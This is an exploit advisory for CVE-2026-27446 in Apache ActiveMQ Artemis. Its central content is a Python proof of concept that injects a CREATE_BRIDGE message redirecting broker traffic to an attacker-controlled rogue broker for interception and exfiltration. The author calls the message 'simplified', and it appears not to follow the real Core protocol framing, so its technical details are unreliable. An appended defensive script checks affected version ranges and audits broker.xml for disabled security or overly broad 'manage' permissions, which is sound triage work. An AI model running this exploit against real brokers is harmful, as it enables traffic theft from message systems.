
📄 Apache Artemis / ActiveMQ Artemis Missing Authentication

🗓️ 06 Mar 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

Artemis Core protocol allows unauthenticated bridges enabling traffic redirection and exfiltration.

=============================================================================================================================================
    | # Title     : Apache ActiveMQ Artemis Unauthorized Bridge Injection via Core Protocol                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://artemis.apache.org/components/artemis/                                                                              |
    =============================================================================================================================================
    
    [+] Summary    : PoC for CVE-2026-27446, targeting the Core protocol of Apache ActiveMQ Artemis on its default port 61616.
    
    The code:
    
    1. Establishes a raw TCP connection to the target broker.
    2. Sends a minimal ARTEMIS handshake to verify Core protocol support.
    3. Attempts to inject a simplified CREATE_BRIDGE control message that redirects traffic to a rogue broker.
    
    If the broker is misconfigured (e.g., security disabled or management permissions improperly restricted), an attacker could potentially create a bridge without authentication, resulting in:
    
    - Message interception
    - Traffic redirection
    - Data exfiltration
    - Broker trust abuse
    
    [+] Affected Versions
    
    Apache Artemis: 2.50.0 → 2.51.0
    
    Apache ActiveMQ Artemis: 2.11.0 → 2.44.0
    
    [+] Fixed in: Apache Artemis 2.52.0
    			  
    [+] POC   :  
    
    import socket
    import struct
    
    TARGET_IP = "192.168.1.100"  
    TARGET_PORT = 61616           
    ATTACKER_IP = "192.168.1.50"  
    
    def create_core_packet(payload):
        """Wraps the data in the Core protocol format (Length + Data)"""
        return struct.pack('>I', len(payload)) + payload
    
    def check_vulnerability():
        try:
            print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((TARGET_IP, TARGET_PORT))
            handshake = b"ARTEMIS" + struct.pack('>I', 1) 
            sock.send(handshake)
            
            response = sock.recv(1024)
            if b"ARTEMIS" not in response:
                print("[-] Target does not seem to support Artemis Core protocol.")
                return
    
            print("[+] Handshake successful. Target supports Core protocol.")        
            print(f"[*] Sending malicious Bridge redirection to {ATTACKER_IP}...")
            evil_payload = f"CREATE_BRIDGE;name=exploit;uri=tcp://{ATTACKER_IP}:61616;queue=ANY".encode()
            sock.send(create_core_packet(evil_payload))
    
            print("[!] Packet sent. Monitor your rogue broker for incoming connections.")
            
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            sock.close()
    
    if __name__ == "__main__":
        check_vulnerability()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
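
For triage on the defending side, the following is an added example (not part of the advisory or of the Artemis project) that checks a broker version against the ranges listed above and audits a `broker.xml` for the two misconfigurations the summary names: security disabled, and the `manage` permission granted too broadly. The `trusted_roles` parameter, the role names and the sample XML are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Affected ranges as listed in the advisory (inclusive); fixed in 2.52.0.
AFFECTED = [((2, 11, 0), (2, 44, 0)), ((2, 50, 0), (2, 51, 0))]

def version_affected(version):
    """True if a version string such as '2.44.0' falls in a listed range."""
    v = tuple(int(p) for p in version.split("-")[0].split(".")[:3])
    return any(lo <= v <= hi for lo, hi in AFFECTED)

def _local(tag):
    """Drop the XML namespace: '{urn:activemq:core}core' -> 'core'."""
    return tag.rsplit("}", 1)[-1]

def audit_broker_xml(xml_text, trusted_roles=("amq",)):
    """Return findings for the misconfigurations the advisory names."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "security-enabled" and (el.text or "").strip().lower() == "false":
            findings.append("security-enabled=false")
        elif name == "security-setting":
            for perm in el:
                if _local(perm.tag) != "permission" or perm.get("type") != "manage":
                    continue
                # 'manage' lets a role send management messages to the broker.
                roles = {r.strip() for r in perm.get("roles", "").split(",")} - {""}
                extra = sorted(roles - set(trusted_roles))
                if extra:
                    findings.append(f"manage on '{el.get('match')}' granted to {extra}")
    return findings

# Constructed sample broker.xml fragment (not taken from a real deployment).
SAMPLE = """<configuration xmlns="urn:activemq">
  <core xmlns="urn:activemq:core">
    <security-enabled>false</security-enabled>
    <security-settings>
      <security-setting match="#">
        <permission type="manage" roles="amq,guest"/>
        <permission type="send" roles="amq,guest"/>
      </security-setting>
    </security-settings>
  </core>
</configuration>"""

if __name__ == "__main__":
    print("2.44.0 affected:", version_affected("2.44.0"))
    for finding in audit_broker_xml(SAMPLE):
        print("FINDING:", finding)
```

Versions between the two listed ranges are reported as not affected only because the advisory does not list them; confirm against the vendor's notice before relying on that result.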
